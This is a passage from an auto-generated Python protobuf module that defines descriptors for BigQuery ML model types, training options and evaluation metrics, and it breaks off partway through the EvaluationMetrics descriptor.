\x01(\x03\x12;\n\tloss_type\x18\x02 \x01(\x0e\x32(.google.cloud.bigquery.v2.Model.LossType\x12\x12\n\nlearn_rate\x18\x03 \x01(\x01\x12\x37\n\x11l1_regularization\x18\x04 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x37\n\x11l2_regularization\x18\x05 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12;\n\x15min_relative_progress\x18\x06 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12.\n\nwarm_start\x18\x07 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12.\n\nearly_stop\x18\x08 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x1b\n\x13input_label_columns\x18\t \x03(\t\x12J\n\x11\x64\x61ta_split_method\x18\n \x01(\x0e\x32/.google.cloud.bigquery.v2.Model.DataSplitMethod\x12 \n\x18\x64\x61ta_split_eval_fraction\x18\x0b \x01(\x01\x12\x19\n\x11\x64\x61ta_split_column\x18\x0c \x01(\t\x12N\n\x13learn_rate_strategy\x18\r \x01(\x0e\x32\x31.google.cloud.bigquery.v2.Model.LearnRateStrategy\x12\x1a\n\x12initial_learn_rate\x18\x10 \x01(\x01\x12o\n\x13label_class_weights\x18\x11 \x03(\x0b\x32R.google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.LabelClassWeightsEntry\x12\x43\n\rdistance_type\x18\x14 \x01(\x0e\x32,.google.cloud.bigquery.v2.Model.DistanceType\x12\x14\n\x0cnum_clusters\x18\x15 \x01(\x03\x12\x11\n\tmodel_uri\x18\x16 \x01(\t\x12S\n\x15optimization_strategy\x18\x17 \x01(\x0e\x32\x34.google.cloud.bigquery.v2.Model.OptimizationStrategy\x1a\x38\n\x16LabelClassWeightsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x01:\x02\x38\x01\x1a\xd7\x03\n\x0fIterationResult\x12*\n\x05index\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int32Value\x12\x30\n\x0b\x64uration_ms\x18\x04 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x33\n\rtraining_loss\x18\x05 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12/\n\teval_loss\x18\x06 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x12\n\nlearn_rate\x18\x07 \x01(\x01\x12^\n\rcluster_infos\x18\x08 \x03(\x0b\x32G.google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.ClusterInfo\x1a\x8b\x01\n\x0b\x43lusterInfo\x12\x13\n\x0b\x63\x65ntroid_id\x18\x01 \x01(\x03\x12\x34\n\x0e\x63luster_radius\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x31\n\x0c\x63luster_size\x18\x03 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01"s\n\tModelType\x12\x1a\n\x16MODEL_TYPE_UNSPECIFIED\x10\x00\x12\x15\n\x11LINEAR_REGRESSION\x10\x01\x12\x17\n\x13LOGISTIC_REGRESSION\x10\x02\x12\n\n\x06KMEANS\x10\x03\x12\x0e\n\nTENSORFLOW\x10\x06"O\n\x08LossType\x12\x19\n\x15LOSS_TYPE_UNSPECIFIED\x10\x00\x12\x15\n\x11MEAN_SQUARED_LOSS\x10\x01\x12\x11\n\rMEAN_LOG_LOSS\x10\x02"H\n\x0c\x44istanceType\x12\x1d\n\x19\x44ISTANCE_TYPE_UNSPECIFIED\x10\x00\x12\r\n\tEUCLIDEAN\x10\x01\x12\n\n\x06\x43OSINE\x10\x02"z\n\x0f\x44\x61taSplitMethod\x12!\n\x1d\x44\x41TA_SPLIT_METHOD_UNSPECIFIED\x10\x00\x12\n\n\x06RANDOM\x10\x01\x12\n\n\x06\x43USTOM\x10\x02\x12\x0e\n\nSEQUENTIAL\x10\x03\x12\x0c\n\x08NO_SPLIT\x10\x04\x12\x0e\n\nAUTO_SPLIT\x10\x05"W\n\x11LearnRateStrategy\x12#\n\x1fLEARN_RATE_STRATEGY_UNSPECIFIED\x10\x00\x12\x0f\n\x0bLINE_SEARCH\x10\x01\x12\x0c\n\x08\x43ONSTANT\x10\x02"n\n\x14OptimizationStrategy\x12%\n!OPTIMIZATION_STRATEGY_UNSPECIFIED\x10\x00\x12\x1a\n\x16\x42\x41TCH_GRADIENT_DESCENT\x10\x01\x12\x13\n\x0fNORMAL_EQUATION\x10\x02"K\n\x0fGetModelRequest\x12\x12\n\nproject_id\x18\x01 \x01(\t\x12\x12\n\ndataset_id\x18\x02 \x01(\t\x12\x10\n\x08model_id\x18\x03 \x01(\t"}\n\x11PatchModelRequest\x12\x12\n\nproject_id\x18\x01 \x01(\t\x12\x12\n\ndataset_id\x18\x02 \x01(\t\x12\x10\n\x08model_id\x18\x03 \x01(\t\x12.\n\x05model\x18\x04 \x01(\x0b\x32\x1f.google.cloud.bigquery.v2.Model"N\n\x12\x44\x65leteModelRequest\x12\x12\n\nproject_id\x18\x01 \x01(\t\x12\x12\n\ndataset_id\x18\x02 \x01(\t\x12\x10\n\x08model_id\x18\x03 \x01(\t"\x82\x01\n\x11ListModelsRequest\x12\x12\n\nproject_id\x18\x01 \x01(\t\x12\x12\n\ndataset_id\x18\x02 \x01(\t\x12\x31\n\x0bmax_results\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.UInt32Value\x12\x12\n\npage_token\x18\x04 \x01(\t"^\n\x12ListModelsResponse\x12/\n\x06models\x18\x01 \x03(\x0b\x32\x1f.google.cloud.bigquery.v2.Model\x12\x17\n\x0fnext_page_token\x18\x02 \x01(\t2\xb9\x04\n\x0cModelService\x12X\n\x08GetModel\x12).google.cloud.bigquery.v2.GetModelRequest\x1a\x1f.google.cloud.bigquery.v2.Model"\x00\x12i\n\nListModels\x12+.google.cloud.bigquery.v2.ListModelsRequest\x1a,.google.cloud.bigquery.v2.ListModelsResponse"\x00\x12\\\n\nPatchModel\x12+.google.cloud.bigquery.v2.PatchModelRequest\x1a\x1f.google.cloud.bigquery.v2.Model"\x00\x12U\n\x0b\x44\x65leteModel\x12,.google.cloud.bigquery.v2.DeleteModelRequest\x1a\x16.google.protobuf.Empty"\x00\x1a\xae\x01\xca\x41\x17\x62igquery.googleapis.com\xd2\x41\x90\x01https://www.googleapis.com/auth/bigquery,https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/cloud-platform.read-onlyBl\n\x1c\x63om.google.cloud.bigquery.v2B\nModelProtoZ@google.golang.org/genproto/googleapis/cloud/bigquery/v2;bigqueryb\x06proto3'
),
dependencies=[
google_dot_cloud_dot_bigquery__v2_dot_proto_dot_model__reference__pb2.DESCRIPTOR,
google_dot_cloud_dot_bigquery__v2_dot_proto_dot_standard__sql__pb2.DESCRIPTOR,
google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,
google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,
google_dot_protobuf_dot_wrappers__pb2.DESCRIPTOR,
google_dot_api_dot_annotations__pb2.DESCRIPTOR,
google_dot_api_dot_client__pb2.DESCRIPTOR,
],
)
_MODEL_MODELTYPE = _descriptor.EnumDescriptor(
name="ModelType",
full_name="google.cloud.bigquery.v2.Model.ModelType",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="MODEL_TYPE_UNSPECIFIED",
index=0,
number=0,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="LINEAR_REGRESSION",
index=1,
number=1,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="LOGISTIC_REGRESSION",
index=2,
number=2,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="KMEANS", index=3, number=3, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="TENSORFLOW", index=4, number=6, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=5432,
serialized_end=5547,
)
_sym_db.RegisterEnumDescriptor(_MODEL_MODELTYPE)
_MODEL_LOSSTYPE = _descriptor.EnumDescriptor(
name="LossType",
full_name="google.cloud.bigquery.v2.Model.LossType",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="LOSS_TYPE_UNSPECIFIED",
index=0,
number=0,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="MEAN_SQUARED_LOSS",
index=1,
number=1,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="MEAN_LOG_LOSS", index=2, number=2, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=5549,
serialized_end=5628,
)
_sym_db.RegisterEnumDescriptor(_MODEL_LOSSTYPE)
_MODEL_DISTANCETYPE = _descriptor.EnumDescriptor(
name="DistanceType",
full_name="google.cloud.bigquery.v2.Model.DistanceType",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="DISTANCE_TYPE_UNSPECIFIED",
index=0,
number=0,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="EUCLIDEAN", index=1, number=1, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="COSINE", index=2, number=2, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=5630,
serialized_end=5702,
)
_sym_db.RegisterEnumDescriptor(_MODEL_DISTANCETYPE)
_MODEL_DATASPLITMETHOD = _descriptor.EnumDescriptor(
name="DataSplitMethod",
full_name="google.cloud.bigquery.v2.Model.DataSplitMethod",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="DATA_SPLIT_METHOD_UNSPECIFIED",
index=0,
number=0,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="RANDOM", index=1, number=1, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="CUSTOM", index=2, number=2, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="SEQUENTIAL", index=3, number=3, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="NO_SPLIT", index=4, number=4, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="AUTO_SPLIT", index=5, number=5, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=5704,
serialized_end=5826,
)
_sym_db.RegisterEnumDescriptor(_MODEL_DATASPLITMETHOD)
_MODEL_LEARNRATESTRATEGY = _descriptor.EnumDescriptor(
name="LearnRateStrategy",
full_name="google.cloud.bigquery.v2.Model.LearnRateStrategy",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="LEARN_RATE_STRATEGY_UNSPECIFIED",
index=0,
number=0,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="LINE_SEARCH", index=1, number=1, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="CONSTANT", index=2, number=2, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=5828,
serialized_end=5915,
)
_sym_db.RegisterEnumDescriptor(_MODEL_LEARNRATESTRATEGY)
_MODEL_OPTIMIZATIONSTRATEGY = _descriptor.EnumDescriptor(
name="OptimizationStrategy",
full_name="google.cloud.bigquery.v2.Model.OptimizationStrategy",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="OPTIMIZATION_STRATEGY_UNSPECIFIED",
index=0,
number=0,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="BATCH_GRADIENT_DESCENT",
index=1,
number=1,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="NORMAL_EQUATION",
index=2,
number=2,
serialized_options=None,
type=None,
),
],
containing_type=None,
serialized_options=None,
serialized_start=5917,
serialized_end=6027,
)
_sym_db.RegisterEnumDescriptor(_MODEL_OPTIMIZATIONSTRATEGY)
_MODEL_REGRESSIONMETRICS = _descriptor.Descriptor(
name="RegressionMetrics",
full_name="google.cloud.bigquery.v2.Model.RegressionMetrics",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="mean_absolute_error",
full_name="google.cloud.bigquery.v2.Model.RegressionMetrics.mean_absolute_error",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="mean_squared_error",
full_name="google.cloud.bigquery.v2.Model.RegressionMetrics.mean_squared_error",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="mean_squared_log_error",
full_name="google.cloud.bigquery.v2.Model.RegressionMetrics.mean_squared_log_error",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="median_absolute_error",
full_name="google.cloud.bigquery.v2.Model.RegressionMetrics.median_absolute_error",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="r_squared",
full_name="google.cloud.bigquery.v2.Model.RegressionMetrics.r_squared",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=884,
serialized_end=1192,
)
_MODEL_AGGREGATECLASSIFICATIONMETRICS = _descriptor.Descriptor(
name="AggregateClassificationMetrics",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="precision",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics.precision",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="recall",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics.recall",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="accuracy",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics.accuracy",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="threshold",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics.threshold",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="f1_score",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics.f1_score",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="log_loss",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics.log_loss",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="roc_auc",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics.roc_auc",
index=6,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1195,
serialized_end=1562,
)
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX = _descriptor.Descriptor(
name="BinaryConfusionMatrix",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="positive_class_threshold",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.positive_class_threshold",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="true_positives",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.true_positives",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="false_positives",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.false_positives",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="true_negatives",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.true_negatives",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="false_negatives",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.false_negatives",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="precision",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.precision",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="recall",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.recall",
index=6,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="f1_score",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.f1_score",
index=7,
number=8,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="accuracy",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.accuracy",
index=8,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1872,
serialized_end=2364,
)
_MODEL_BINARYCLASSIFICATIONMETRICS = _descriptor.Descriptor(
name="BinaryClassificationMetrics",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="aggregate_classification_metrics",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.aggregate_classification_metrics",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="binary_confusion_matrix_list",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.binary_confusion_matrix_list",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="positive_label",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.positive_label",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="negative_label",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.negative_label",
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1565,
serialized_end=2364,
)
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ENTRY = _descriptor.Descriptor(
name="Entry",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Entry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="predicted_label",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Entry.predicted_label",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="item_count",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Entry.item_count",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2799,
serialized_end=2880,
)
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ROW = _descriptor.Descriptor(
name="Row",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Row",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="actual_label",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Row.actual_label",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="entries",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Row.entries",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2883,
serialized_end=3014,
)
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX = _descriptor.Descriptor(
name="ConfusionMatrix",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="confidence_threshold",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.confidence_threshold",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="rows",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.rows",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ENTRY,
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ROW,
],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2621,
serialized_end=3014,
)
_MODEL_MULTICLASSCLASSIFICATIONMETRICS = _descriptor.Descriptor(
name="MultiClassClassificationMetrics",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="aggregate_classification_metrics",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.aggregate_classification_metrics",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="confusion_matrix_list",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.confusion_matrix_list",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2367,
serialized_end=3014,
)
_MODEL_CLUSTERINGMETRICS = _descriptor.Descriptor(
name="ClusteringMetrics",
full_name="google.cloud.bigquery.v2.Model.ClusteringMetrics",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="davies_bouldin_index",
full_name="google.cloud.bigquery.v2.Model.ClusteringMetrics.davies_bouldin_index",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="mean_squared_distance",
full_name="google.cloud.bigquery.v2.Model.ClusteringMetrics.mean_squared_distance",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3017,
serialized_end=3157,
)
_MODEL_EVALUATIONMETRICS = _descriptor.Descriptor(
name="EvaluationMetrics",
full_name="google.cloud.bigquery.v2.Model.EvaluationMetrics",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="regression_metrics",
full_name="google.cloud.bigquery.v2.Model.EvaluationMetrics.regression_metrics",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="binary_classification_metrics",
full_name="google.cloud.bigquery.v2.Model.EvaluationMetrics.binary_classification_metrics",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
